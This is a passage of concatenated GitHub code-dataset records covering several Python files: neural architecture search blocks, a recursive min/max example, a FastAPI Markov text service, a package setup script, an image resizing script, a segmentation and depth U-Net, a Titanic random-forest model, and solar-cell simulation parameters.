self.extract_dconv(x, training, kernel_size=kernel_size, depth_multiplier=1)\r\n x = self.extract_bn(x, training=training)\r\n x = self.extract_act(x)\r\n\r\n x = self.project_conv(x, training, filters_out = filters_out, kernel_size=1)\r\n x = self.project_bn(x, training=training)\r\n \r\n if self.use_shortcut and origin.shape[1:] == x.shape[1:]:\r\n x = self.dp(x, training)\r\n x = x + origin\r\n \r\n return x\r\n\r\n\r\nclass SuperKESMBConvBlock(Model):\r\n\r\n \"\"\"\r\n \"kernel size and expand ratio select ConvBlock\r\n \"\"\"\r\n def __init__(self, \r\n expand_ratio, \r\n kernel_size,\r\n **kwargs):\r\n super(SuperKESMBConvBlock, self).__init__(name=kwargs['name'])\r\n self.expand_ratio = expand_ratio\r\n self.kernel_size = kernel_size\r\n\r\n #self.choices = [ [[]] * len(expand_ratio) ] 
* len(kernel_size)\r\n self.choices = [] \r\n for k_size in kernel_size:\r\n for ex_ratio in expand_ratio:\r\n self.choices.append( SuperMBConvBlock(max_expand_ratio=ex_ratio, \r\n max_kernel_size=k_size, **kwargs) )\r\n \r\n def call(self, x, training, expand_ratio=None, kernel_size=None, **kwargs):\r\n \r\n assert kernel_size in self.kernel_size\r\n assert expand_ratio in self.expand_ratio\r\n\r\n i = self.kernel_size.index(kernel_size)*len(self.expand_ratio)\r\n j = self.expand_ratio.index(expand_ratio)\r\n x = self.choices[i+j](x, training, **kwargs)\r\n return x\r\n\r\nclass SuperKSMBConvBlock(Model):\r\n\r\n \"\"\"\r\n \"kernel size select ConvBlock\r\n \"\"\"\r\n def __init__(self, \r\n kernel_size,\r\n **kwargs):\r\n super(SuperKSMBConvBlock, self).__init__(name=kwargs['name'])\r\n self.kernel_size = kernel_size\r\n\r\n self.choices = [] \r\n for k_size in kernel_size:\r\n self.choices.append( SuperMBConvBlock(max_kernel_size=k_size, **kwargs) )\r\n \r\n def call(self, x, training, kernel_size=None, **kwargs):\r\n \r\n assert kernel_size in self.kernel_size\r\n\r\n i = self.kernel_size.index(kernel_size)\r\n x = self.choices[i](x, training, **kwargs)\r\n return x\r\n\r\nclass SuperESMBConvBlock(Model):\r\n\r\n \"\"\"\r\n \"expand ratio select ConvBlock\r\n \"\"\"\r\n def __init__(self, \r\n expand_ratio, \r\n **kwargs):\r\n super(SuperESMBConvBlock, self).__init__(name=kwargs['name'])\r\n self.expand_ratio = expand_ratio\r\n\r\n self.choices = [] \r\n for ex_ratio in expand_ratio:\r\n self.choices.append( SuperMBConvBlock(max_expand_ratio=ex_ratio, **kwargs) )\r\n \r\n def call(self, x, training, expand_ratio=None,**kwargs):\r\n \r\n assert expand_ratio in self.expand_ratio\r\n\r\n i = self.expand_ratio.index(expand_ratio)\r\n x = self.choices[i](x, training, **kwargs)\r\n return x","repo_name":"Brococoli/FairNAS","sub_path":"oneshot_nas_blocks.py","file_name":"oneshot_nas_blocks.py","file_ext":"py","file_size_in_byte":18455,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"30838828508","text":"def minNum(arr, n):\n \"\"\"Returns the minimum number from the array using recursion\n Base case: if len(arr) is 1 then return arr[0]\n else return minimum of (n-1)th element and recursion output for n-1 elements\n Time: O(n) since one comparison is made per element across the recursive calls\n Space: O(n) since the recursion stack grows to depth n\n \"\"\"\n\n if n == 1:\n return arr[0]\n else:\n return min(minNum(arr, n - 1), arr[n - 1])\n\n\ndef maxNum(arr, n):\n if n == 1:\n return arr[0]\n else:\n # the below block essentially is MAX(arr[n-1], arr[n-2],........., arr[0])\n return max(arr[n - 1], maxNum(arr, n - 1))\n\n\nif __name__ == \"__main__\":\n arr = [1, 4, 45, 6, -50, 10, 2]\n n = len(arr)\n print(minNum(arr, n))\n print(maxNum(arr, n))\n","repo_name":"ashirwadsangwan/Handbook-of-DS-Learning","sub_path":"DS and Algorithms/Topics/Recursion/minMaxOfArray.py","file_name":"minMaxOfArray.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19421591460","text":"from fastapi import FastAPI\nimport markovify\nimport time\nimport uvicorn\nfrom os import environ\n\napp = FastAPI()\nport = int(environ.get('PORT', 3000))\n\nwith open('./aqua.json', 
'r') as file:\n aqua_model = markovify.Text.from_json(file.read())\n\n@app.get('/')\ndef root():\n return {'endpoints': ['/aqua']}\n\n@app.get('/aqua')\ndef aqua(short: bool = False):\n start = time.perf_counter()\n while True:\n if short == True:\n response = aqua_model.make_short_sentence(max_chars=50)\n else:\n response = aqua_model.make_sentence()\n if response is not None:\n break\n end = time.perf_counter()\n return {\n 'response': response,\n 'compute_time': end - start\n }\n\nuvicorn.run(app, host='0.0.0.0', port=port)\n","repo_name":"MarsRon/aqua","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19122936944","text":"import setuptools\n\nwith open(\"README.org\", \"r\") as fh:\n long_description = fh.read()\n\n\nsetuptools.setup(\n name=\"ProxyTweet\",\n version=\"0.0.1\",\n author=\"Nathan Dwarhsuis\",\n author_email=\"natedwarshuis@gmail.com\",\n description=\"A lightweight Twitter to RSS feed generator\",\n long_description=long_description,\n long_description_content_type=\"text/x-org\",\n url=\"https://github.com/ndwarshuis/proxytweet\",\n zip_safe=False,\n include_package_data=True,\n packages=setuptools.find_packages(),\n install_requires=[\"Flask\", \"twitterscraper\", \"rfeed\", \"beautifulsoup4\"],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: OS Independent\",\n ],\n entry_points={\"console_scripts\": [\"proxytweet=proxytweet.app:main\"]},\n)\n","repo_name":"ndwarshuis/proxytweet","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24834920559","text":"''' IMPORTANT: Run this .py file from the terminal ONLY after navigating to the folder where your raw images are located\n\tThis script will read images from the current directory and resize them to 100x100, in grayscale, and put them\n\tin the mentioned folder\n\n'''\n\nimport os\nimport cv2\n\nht = 100\ni = 0\nos.chdir('/home/pallab/Pictures/Data/rawimgs')\nfor pic in os.listdir('.'):\n img = cv2.imread(pic, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (ht, ht))\n cv2.imwrite('/home/pallab/Pictures/Data/treatedimgs/'+str(i)+'.jpg', img)\n i += 1\n\nprint('Resized and greyed', i, 'files', sep = ' ')\n","repo_name":"pallabganguly/opcv-project","sub_path":"src/resizeneg.py","file_name":"resizeneg.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2948725479","text":"from typing import Dict, Tuple\r\n\r\nimport math\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nfrom torchvision import models\r\nfrom . 
import segmentation_definitions as segdef\r\n\r\n\r\nDEPTH_BINS = 50\r\nDEPTH_MAX = 5.0\r\n\r\nDISTR_DEPTH = True\r\nVEC_HEAD = True\r\n\r\nTRAIN_DEPTH_ONLY = False\r\nTRAIN_SEG_ONLY = True\r\nTRAIN_INV_ONLY = False\r\n\r\n\r\ndef _multidim_sm(x: torch.tensor, dims: Tuple[int, ...], log: bool):\r\n #_check_dims_consecutive(dims)\r\n init_shape = x.shape\r\n dims = list(sorted(dims))\r\n new_shape = [d for i, d in enumerate(init_shape) if i not in dims]\r\n new_shape = new_shape[:dims[0]] + [-1] + new_shape[dims[0]:]\r\n x = x.reshape(new_shape)\r\n dim = dims[0]\r\n\r\n if log:\r\n x = F.log_softmax(x, dim=dim)\r\n else:\r\n x = F.softmax(x, dim=dim)\r\n\r\n x = x.reshape(init_shape)\r\n return x\r\n\r\ndef multidim_softmax(x: torch.tensor, dims: Tuple[int, ...]) -> torch.tensor:\r\n return _multidim_sm(x, dims, log=False)\r\n\r\n\r\ndef multidim_logsoftmax(x: torch.tensor, dims: Tuple[int, ...]) -> torch.tensor:\r\n return _multidim_sm(x, dims, log=True)\r\n\r\n\r\nclass DepthEstimate():\r\n\r\n def __init__(self, depth_pred, num_bins, max_depth):\r\n # depth_pred: BxCxHxW tensor of depth probabilities over C depth bins\r\n # Convert logprobabilities to probabilities\r\n if depth_pred.max() < 0:\r\n depth_pred = torch.exp(depth_pred)\r\n\r\n if ((depth_pred.sum(dim=1) - 1).abs() < 1e-2).all():\r\n pass\r\n else:\r\n pickle.dump(depth_pred, open(\"depth_pred.p\", \"wb\"))\r\n assert ((depth_pred.sum(dim=1) - 1).abs() < 1e-2).all(), \"Depth prediction needs to be a simplex at each pixel, current sum is \" + str(depth_pred.sum(dim=1))\r\n\r\n self.depth_pred = depth_pred\r\n self.num_bins = num_bins\r\n self.max_depth = max_depth\r\n\r\n def to(self, device):\r\n depth_pred = self.depth_pred.to(device)\r\n return DepthEstimate(depth_pred, self.num_bins, self.max_depth)\r\n\r\n def domain(self, res=None):\r\n if res is None:\r\n res = self.num_bins\r\n return torch.arange(0, res, 1, device=self.depth_pred.device)[None, :, None, None]\r\n\r\n def domain_image(self, res=None):\r\n if res is None:\r\n res = self.num_bins\r\n domain = self.domain(res)\r\n domain_image = domain.repeat((1, 1, self.depth_pred.shape[2], self.depth_pred.shape[3])) * (self.max_depth / res)\r\n return domain_image\r\n\r\n def mle(self):\r\n mle_depth = self.depth_pred.argmax(dim=1, keepdim=True).float() * (self.max_depth / self.num_bins)\r\n return mle_depth\r\n\r\n def expectation(self):\r\n expected_depth = (self.domain() * self.depth_pred).sum(dim=1, keepdims=True) * (self.max_depth / self.num_bins)\r\n return expected_depth\r\n\r\n def spread(self):\r\n spread = (self.mle() - self.expectation()).abs()\r\n return spread\r\n\r\n def percentile(self, which):\r\n domain = self.domain()\r\n cumsum = self.depth_pred.cumsum(dim=1)\r\n pctlbin = ((cumsum < which) * domain).max(dim=1, keepdim=True).values\r\n pctldepth = pctlbin * (self.max_depth / self.num_bins)\r\n return pctldepth\r\n\r\n def get_trustworthy_depth(self, include_mask=None, confidence=0.9, max_conf_int_width_prop=0.30, include_mask_prop=1.0):\r\n conf_int_lower = self.percentile((1 - confidence) / 2)\r\n conf_int_upper = self.percentile(1 - (1 - confidence) / 2)\r\n\r\n spread = conf_int_upper - conf_int_lower\r\n max_conf_int_width = self.expectation() * max_conf_int_width_prop\r\n trusted_mask = spread < max_conf_int_width\r\n\r\n accept_mask = trusted_mask * (1-include_mask.bool().float()).bool()\r\n\r\n if include_mask is not None:\r\n # Apply looser criteria for objects that the agent is actively looking for\r\n include_mask_criteria = spread < 
include_mask_prop * self.expectation()\r\n include_mask_solid = include_mask_criteria * include_mask\r\n accept_mask = accept_mask.bool() + include_mask_solid.bool()\r\n\r\n est_depth = self.mle()\r\n trustworthy_depth = est_depth * accept_mask\r\n return trustworthy_depth\r\n\r\n\r\nclass DoubleConv(torch.nn.Module):\r\n def __init__(self, cin, cout, k, stride=1, padding=0, cmid=None, stride2=1):\r\n super(DoubleConv, self).__init__()\r\n if cmid is None:\r\n cmid = cin\r\n self.conv1 = nn.Conv2d(cin, cmid, k, stride=stride, padding=padding)\r\n self.conv2 = nn.Conv2d(cmid, cout, k, stride=stride2, padding=padding)\r\n\r\n def init_weights(self):\r\n torch.nn.init.kaiming_uniform(self.conv1.weight)\r\n self.conv1.bias.data.fill_(0)\r\n torch.nn.init.kaiming_uniform(self.conv2.weight)\r\n self.conv2.bias.data.fill_(0)\r\n\r\n def forward(self, img):\r\n x = self.conv1(img)\r\n x = F.leaky_relu(x)\r\n x = self.conv2(x)\r\n return x\r\n\r\n\r\nclass UpscaleDoubleConv(torch.nn.Module):\r\n def __init__(self, cin, cout, k, stride=1, padding=0):\r\n super(UpscaleDoubleConv, self).__init__()\r\n self.conv1 = nn.Conv2d(cin, cout, k, stride=1, padding=padding)\r\n #self.upsample1 = Upsample(scale_factor=2, mode=\"nearest\")\r\n self.conv2 = nn.Conv2d(cout, cout, k, stride=1, padding=padding)\r\n\r\n def init_weights(self):\r\n torch.nn.init.kaiming_uniform(self.conv1.weight)\r\n self.conv1.bias.data.fill_(0)\r\n torch.nn.init.kaiming_uniform(self.conv2.weight)\r\n self.conv2.bias.data.fill_(0)\r\n\r\n def forward(self, img, output_size):\r\n x = self.conv1(img)\r\n x = F.leaky_relu(x)\r\n x = F.interpolate(x, scale_factor=2, mode=\"nearest\")\r\n x = self.conv2(x)\r\n if x.shape[2] > output_size[2]:\r\n x = x[:, :, :output_size[2], :]\r\n if x.shape[3] > output_size[3]:\r\n x = x[:, :, :, :output_size[3]]\r\n return x\r\n\r\n\r\nclass SimpleUNEt(torch.nn.Module):\r\n def __init__(self, distr_depth, vec_head, segonly):\r\n super(SimpleUNEt, self).__init__()\r\n\r\n self.num_c = segdef.get_num_objects()\r\n self.depth_bins = 50\r\n\r\n class objectview(object):\r\n def __init__(self, d):\r\n self.__dict__ = d\r\n params = {\r\n \"in_channels\": 3,\r\n \"hc1\": 256 if distr_depth else 256,\r\n \"hc2\": 256 if distr_depth else 256,\r\n \"out_channels\": self.num_c + DEPTH_BINS if distr_depth else self.num_c + 1,\r\n \"out_vec_length\": self.num_c + 1,\r\n \"stride\": 2\r\n }\r\n\r\n self.p = objectview(params)\r\n self.distr_depth = distr_depth\r\n self.vec_head = vec_head\r\n\r\n DeconvOp = UpscaleDoubleConv\r\n ConvOp = DoubleConv\r\n\r\n # inchannels, outchannels, kernel size\r\n self.conv1 = ConvOp(self.p.in_channels, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.conv2 = ConvOp(self.p.hc1, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.conv3 = ConvOp(self.p.hc1, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.conv4 = ConvOp(self.p.hc1, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.conv5 = ConvOp(self.p.hc1, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.conv6 = ConvOp(self.p.hc1, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n\r\n self.deconv1 = DeconvOp(self.p.hc1, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.deconv2 = DeconvOp(self.p.hc1 * 2, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.deconv3 = DeconvOp(self.p.hc1 * 2, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.deconv4 = DeconvOp(self.p.hc1 * 2, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.deconv5 = DeconvOp(self.p.hc1 * 2, self.p.hc2, 3, 
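`UpscaleDoubleConv` above replaces a transposed convolution with conv, nearest-neighbour upsampling, then conv, cropping the result down to the skip connection's size. Here is a self-contained sketch of that decoder step; channel counts and spatial sizes are illustrative:

```python
# Hedged sketch of the UpscaleDoubleConv idea in isolation: upsample + conv
# avoids the checkerboard artifacts transposed convolutions can produce.
import torch
import torch.nn.functional as F
from torch import nn

conv1 = nn.Conv2d(8, 8, 3, padding=1)
conv2 = nn.Conv2d(8, 8, 3, padding=1)

x = torch.randn(1, 8, 7, 7)                          # encoder feature map
y = F.leaky_relu(conv1(x))
y = F.interpolate(y, scale_factor=2, mode="nearest")  # 7x7 -> 14x14
y = conv2(y)

# The model crops to the matching encoder map's size, since doubling an odd
# spatial dim overshoots it (e.g. an encoder map of 13 pairs with 7 -> 14).
target = (1, 8, 13, 13)
y = y[:, :, :target[2], :target[3]]
print(y.shape)                                        # torch.Size([1, 8, 13, 13])
```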
stride=self.p.stride, padding=1)\r\n self.deconv6 = DeconvOp(self.p.hc1 + self.p.hc2, self.p.out_channels, 3, stride=self.p.stride, padding=1)\r\n\r\n if self.vec_head:\r\n self.linear1 = nn.Linear(self.p.hc1, self.p.hc1)\r\n self.linear2 = nn.Linear(self.p.hc1, self.p.out_vec_length)\r\n\r\n self.act = nn.LeakyReLU()\r\n self.dropout = nn.Dropout(0.5)\r\n self.dropout2 = nn.Dropout(0.5)\r\n self.norm2 = nn.InstanceNorm2d(self.p.hc1)\r\n self.norm3 = nn.InstanceNorm2d(self.p.hc1)\r\n self.norm4 = nn.InstanceNorm2d(self.p.hc1)\r\n self.norm5 = nn.InstanceNorm2d(self.p.hc1)\r\n self.norm6 = nn.InstanceNorm2d(self.p.hc1)\r\n # self.dnorm1 = nn.InstanceNorm2d(in_channels * 4)\r\n self.dnorm2 = nn.InstanceNorm2d(self.p.hc1)\r\n self.dnorm3 = nn.InstanceNorm2d(self.p.hc1)\r\n self.dnorm4 = nn.InstanceNorm2d(self.p.hc1)\r\n self.dnorm5 = nn.InstanceNorm2d(self.p.hc2)\r\n\r\n def init_weights(self):\r\n self.conv1.init_weights()\r\n self.conv2.init_weights()\r\n self.conv3.init_weights()\r\n self.conv4.init_weights()\r\n self.conv5.init_weights()\r\n self.deconv1.init_weights()\r\n self.deconv2.init_weights()\r\n self.deconv3.init_weights()\r\n self.deconv4.init_weights()\r\n #self.deconv5.init_weights()\r\n\r\n def forward(self, input):\r\n x1 = self.norm2(self.act(self.conv1(input)))\r\n x2 = self.norm3(self.act(self.conv2(x1)))\r\n x3 = self.norm4(self.act(self.conv3(x2)))\r\n\r\n x3 = self.dropout(x3)\r\n\r\n x4 = self.norm5(self.act(self.conv4(x3)))\r\n x5 = self.norm6(self.act(self.conv5(x4)))\r\n x6 = self.act(self.conv6(x5))\r\n\r\n x6 = self.dropout(x6)\r\n\r\n y5 = self.act(self.deconv1(x6, output_size=x5.size()))\r\n xy5 = torch.cat([x5, y5], 1)\r\n\r\n y4 = self.dnorm3(self.act(self.deconv2(xy5, output_size=x4.size())))\r\n xy4 = torch.cat([x4, y4], 1)\r\n y3 = self.dnorm4(self.act(self.deconv3(xy4, output_size=x3.size())))\r\n xy3 = torch.cat([x3, y3], 1)\r\n y2 = self.dnorm4(self.act(self.deconv4(xy3, output_size=x2.size())))\r\n xy2 = torch.cat([x2, y2], 1)\r\n\r\n xy2 = self.dropout(xy2)\r\n\r\n y1 = self.dnorm5(self.act(self.deconv5(xy2, output_size=x1.size())))\r\n xy1 = torch.cat([x1, y1], 1)\r\n out = self.deconv6(xy1, output_size=input.size())\r\n\r\n out_a = out[:, :self.num_c]\r\n out_b = out[:, self.num_c:]\r\n\r\n out_a = multidim_logsoftmax(out_a, dims=(1,))\r\n\r\n if self.distr_depth:\r\n out_b = multidim_logsoftmax(out_b, dims=(1,))\r\n\r\n if self.vec_head:\r\n vec_head = self.linear2(self.act(self.linear1(x6.mean(dim=2).mean(dim=2))))\r\n vec_head = F.log_softmax(vec_head, dim=1)\r\n else:\r\n vec_head = None\r\n\r\n return out_a, out_b, vec_head\r\n\r\n\r\nclass AlfredSegmentationAndDepthModel(nn.Module):\r\n\r\n \"\"\"\r\n Given a current state s_t, proposes an action distribution that makes sense.\r\n \"\"\"\r\n def __init__(self, hparams = None, distr_depth=DISTR_DEPTH, vec_head=VEC_HEAD, segonly=False):\r\n super().__init__()\r\n self.hidden_dim = 128\r\n self.semantic_channels = segdef.get_num_objects()\r\n self.distr_depth = distr_depth\r\n self.vec_head = vec_head\r\n\r\n self.net = SimpleUNEt(distr_depth, vec_head, segonly)\r\n\r\n self.iter = nn.Parameter(torch.zeros([1], dtype=torch.double), requires_grad=False)\r\n\r\n self.nllloss = nn.NLLLoss(reduce=True, size_average=True)\r\n self.celoss = nn.CrossEntropyLoss(reduce=True, size_average=True)\r\n self.mseloss = nn.MSELoss(reduce=True, size_average=True)\r\n self.act = nn.LeakyReLU()\r\n\r\n def predict(self, rgb_image):\r\n with torch.no_grad():\r\n if self.distr_depth:\r\n DEPTH_TEMPERATURE_BETA = 0.5# 
0.5 # 1.0# 0.3\r\n SEG_TEMPERATURE_BETA = 1.0 # 1.5\r\n\r\n seg_pred, depth_pred, vec_head = self.forward_model(rgb_image)\r\n seg_pred = torch.exp(seg_pred * SEG_TEMPERATURE_BETA)\r\n depth_pred = torch.exp(depth_pred * DEPTH_TEMPERATURE_BETA)\r\n depth_pred = depth_pred / (depth_pred.sum(dim=1, keepdim=True))\r\n\r\n depth_pred = DepthEstimate(depth_pred, DEPTH_BINS, DEPTH_MAX)\r\n\r\n # Filter segmentations\r\n good_seg_mask = seg_pred > 0.3\r\n seg_pred = seg_pred * good_seg_mask\r\n seg_pred = seg_pred / (seg_pred.sum(dim=1, keepdims=True) + 1e-10)\r\n else:\r\n seg_pred, depth_pred, vec_head = self.forward_model(rgb_image)\r\n seg_pred = torch.exp(seg_pred)\r\n\r\n good_seg_mask = seg_pred > 0.3\r\n good_depth_mask = (seg_pred > 0.5).sum(dim=1, keepdims=True) * (depth_pred > 0.9)\r\n seg_pred = seg_pred * good_seg_mask\r\n seg_pred = seg_pred / (seg_pred.sum(dim=1, keepdims=True) + 1e-10)\r\n depth_pred = depth_pred * good_depth_mask\r\n\r\n return seg_pred, depth_pred\r\n\r\n def forward_model(self, rgb_image: torch.tensor):\r\n return self.net(rgb_image)\r\n\r\n def get_name(self) -> str:\r\n return \"alfred_segmentation_and_depth_model\"\r\n\r\n def loss(self, batch: Dict):\r\n # This is now forward\r\n return self.forward(batch)\r\n\r\n def forward(self, batch: Dict):\r\n observations = batch[\"observations\"]\r\n\r\n rgb_image = observations.rgb_image.float()\r\n seg_gt = observations.semantic_image.float().clone()\r\n depth_gt = observations.depth_image.float()\r\n inv_gt = observations.inventory_vector.float()\r\n inv_gt_int = (inv_gt.argmax(dim=1) + 1) * (inv_gt.max(1).values > 0.5)\r\n\r\n # Switch to a one-hot segmentation representation\r\n observations.uncompress()\r\n seg_gt_oh = observations.semantic_image.float()\r\n\r\n b, c, h, w = seg_gt.shape\r\n\r\n seg_pred, depth_pred, vec_head = self.forward_model(rgb_image)\r\n\r\n c = seg_pred.shape[1]\r\n\r\n seg_flat_pred = seg_pred.permute((0, 2, 3, 1)).reshape([b * h * w, c])\r\n seg_flat_gt = seg_gt.permute((0, 2, 3, 1)).reshape([b * h * w]).long()\r\n\r\n seg_loss = self.nllloss(seg_flat_pred, seg_flat_gt)\r\n\r\n if VEC_HEAD:\r\n inv_loss = self.nllloss(vec_head, inv_gt_int)\r\n\r\n if self.distr_depth:\r\n depth_flat_pred = depth_pred.permute((0, 2, 3, 1)).reshape([b * h * w, DEPTH_BINS])\r\n depth_flat_gt = depth_gt.permute((0, 2, 3, 1)).reshape([b * h * w])\r\n depth_flat_gt = ((depth_flat_gt / DEPTH_MAX).clamp(0, 0.999) * DEPTH_BINS).long()\r\n depth_loss = self.nllloss(depth_flat_pred, depth_flat_gt)\r\n\r\n depth_pred_mean = (torch.arange(0, DEPTH_BINS, 1, device=depth_pred.device)[None, :, None, None] * torch.exp(depth_pred)).sum(dim=1)\r\n depth_mae = (depth_pred_mean.view([-1]) - depth_flat_gt).abs().float().mean() * (DEPTH_MAX / DEPTH_BINS)\r\n\r\n else:\r\n depth_flat_pred = depth_pred.reshape([b, h * w])\r\n depth_flat_gt = depth_gt.reshape([b, h * w])\r\n depth_loss = self.mseloss(depth_flat_pred, depth_flat_gt)\r\n depth_mae = (depth_flat_pred - depth_flat_gt).abs().mean()\r\n\r\n seg_pred_distr = torch.exp(seg_pred)\r\n\r\n if TRAIN_DEPTH_ONLY:\r\n loss = depth_loss\r\n elif TRAIN_SEG_ONLY:\r\n loss = seg_loss\r\n else:\r\n loss = seg_loss + depth_loss\r\n\r\n if VEC_HEAD:\r\n loss = loss + inv_loss\r\n\r\n metrics = {}\r\n metrics[\"loss\"] = loss.item()\r\n metrics[\"seg_loss\"] = seg_loss.item()\r\n metrics[\"depth_loss\"] = depth_loss.item()\r\n metrics[\"depth_mae\"] = depth_mae.item()\r\n if VEC_HEAD:\r\n metrics[\"inv_loss\"] = inv_loss.item()\r\n\r\n self.iter += 1\r\n\r\n return loss, 
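The loss above discretises metric depth into `DEPTH_BINS` classes for an NLL objective and decodes predictions back to metres via an expectation over bin indices. A small sketch of both directions, using the same constants:

```python
# Hedged sketch of the depth discretisation used in the loss: depth is
# clamped to [0, DEPTH_MAX), mapped to an integer bin, and decoded back by
# taking the expectation over the predicted bin distribution.
import torch

DEPTH_BINS, DEPTH_MAX = 50, 5.0

depth_m = torch.tensor([0.0, 1.23, 4.99, 7.5])   # metres; 7.5 overflows the range
bins = ((depth_m / DEPTH_MAX).clamp(0, 0.999) * DEPTH_BINS).long()
print(bins)                                      # tensor([ 0, 12, 49, 49])

# Decoding: expectation over bin indices, rescaled to metres.
probs = torch.softmax(torch.randn(4, DEPTH_BINS), dim=1)
domain = torch.arange(DEPTH_BINS).float()
decoded = (probs * domain).sum(dim=1) * (DEPTH_MAX / DEPTH_BINS)
print(decoded)                                   # values in [0, 5)
```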
metrics\r\n","repo_name":"soyeonm/FILM","sub_path":"models/depth/alfred_perception_models.py","file_name":"alfred_perception_models.py","file_ext":"py","file_size_in_byte":15736,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"53"} +{"seq_id":"3154193101","text":"import pandas as pd\nimport numpy as np \nfrom sklearn.ensemble import RandomForestClassifier\n\ndef filterData(df):\n\tdf['Gender'] = df['Sex'].map({'female':0,'male':1})\n\tdf['AgeFill'] = df['Age']\n\n\tmedian_ages = np.zeros((2,3))\n\tfor i in range(0,2):\n\t\tfor j in range(0,3):\n\t\t\tmedian_ages[i,j] = df.loc[(df['Gender'] == i) & (df['Pclass'] == j+1),'Age'].median()\n\n\n\tfor i in range(0,2):\n\t\tfor j in range(0,3):\n\t\t\tdf.loc[(df.Age.isnull()) & (df['Gender'] == i) & (df['Pclass'] == j+1),'AgeFill'] = median_ages[i,j]\n\n\n\tdf = df.drop(['Name','Sex','Age','Ticket','Cabin','Embarked'],axis=1)\n\tdf.loc[df.Fare.isnull(),'Fare'] = df['Fare'].median()\n\tdf['Age*Class'] = df.AgeFill * df.Pclass\n\tdf['FamilySize'] = df.SibSp + df.Parch\n\treturn df\n\ndf = pd.read_csv('train.csv',header=0)\ndf = filterData(df)\ntrain_data = df.values\n\nforest = RandomForestClassifier(n_estimators = 100)\nforest = forest.fit(train_data[0::,2::],train_data[0::,1])\n\ntest_df = pd.read_csv('test.csv',header=0)\ntest_df = filterData(test_df)\ntest_data = test_df.values\n\noutput = forest.predict(test_data[0::,1::])\n\nresult = open('multimodel.csv','wb')\nresult.write('PassengerId,Survived\\n')\n\nfor row0,row1 in zip(test_data[0::,0],output):\n\tresult.write('{0},{1}\\n'.format(int(row0),int(row1)))\n\nresult.close()\n\n","repo_name":"THTBSE/MachineLearning","sub_path":"kaggle/titanic/multivaribleModel.py","file_name":"multivaribleModel.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"8342224004","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 9 09:56:36 2021\r\n\r\n@author: Abdul\r\n\"\"\"\r\n\r\nimport deltapv as dpv\r\nfrom jax import numpy as jnp, grad\r\nimport os,sys\r\nimport subprocess as SC\r\nimport pandas as pd\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as pl\r\n\r\n\r\nfrontworkfunction = 4.0964\r\nbackworkfunction = 5.1738 \r\n\r\n\r\n\r\nChi_HTM= 2.0355\r\nEg_HTM= 3.3645\r\neps_HTM= 16.161\r\nNc_HTM=1e20\r\nNv_HTM=1e18\r\nmn_HTM=4.9727\r\nmp_HTM=436.13\r\ntn_HTM=1e-3\r\ntp_HTM=1e-3\r\nA_HTM=2e4\r\nthickness_HTM = 0.0004989\r\nnumacceptor = 1e9\r\n\r\nChi_ETM= 4.0303\r\nEg_ETM= 3.9375\r\neps_ETM= 7.3402\r\nNc_ETM=1e18\r\nNv_ETM=1e18\r\nmn_ETM=175.49\r\nmp_ETM= 5.4444\r\ntn_ETM=1e-3\r\ntp_ETM=1e-3\r\nA_ETM=2e4\r\nthickness_ETM = 0.0001707\r\nnum_donor = 1e9\r\n\r\nChi_absorber=3.9,\r\nEg_Absorber=1.5,\r\neps_absorber=10,\r\nNc_absorber=3.9e18,\r\nNv_absorber=2.7e18,\r\nmn_absorber=2,\r\nmp_absorber=2,\r\ntn_absorber=1e-3,\r\ntp_absorber=1e-3,\r\nA_absorber=2e4,\r\nthickness_absorber= 0.0007321\r\n\r\n\r\n######\r\n######\r\n######\r\n######\r\n######\r\n##### low :\r\n\r\n \r\n\r\nlow_frontworkfunction = 4\r\nlow_backworkfunction = 4.5 \r\n\r\n\r\n\r\nlow_Chi_HTM= 2.0\r\nlow_Eg_HTM= 1.3\r\nlow_eps_HTM= 2\r\nlow_Nc_HTM=2.2e19\r\nlow_Nv_HTM=3.9e19\r\nlow_mn_HTM=1e-2\r\nlow_mp_HTM=1e-2\r\nlow_tn_HTM=1e-5\r\nlow_tp_HTM=1e-5\r\nlow_A_HTM=2e4\r\nlow_thickness_HTM = 0.000005\r\nlow_numacceptor = 1e13\r\n\r\nlow_Chi_ETM= 3.8\r\nlow_Eg_ETM= 1.55\r\nlow_eps_ETM= 2\r\nlow_Nc_ETM=2e19\r\nlow_Nv_ETM=6e19\r\nlow_mn_ETM=1e-2\r\nlow_mp_ETM= 
